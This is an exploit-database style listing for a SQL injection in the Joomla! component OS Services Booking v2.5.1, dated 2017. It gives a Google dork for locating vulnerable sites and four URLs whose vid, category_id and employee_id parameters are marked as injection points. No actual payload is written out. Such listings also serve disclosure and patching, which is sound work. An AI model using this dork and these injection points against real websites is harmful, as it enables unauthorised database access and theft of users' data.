21 lines
No EOL
990 B
Text
21 lines
No EOL
990 B
Text
# # # # #
|
|
# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_osservicesbooking
|
|
# Date: 18.02.2017
|
|
# Vendor Homepage: https://www.joomdonation.com/
|
|
# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
|
|
# Demo: http://osb.ext4joomla.com/
|
|
# Version: 2.5.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
|
|
# Etc..
|
|
# # # # # |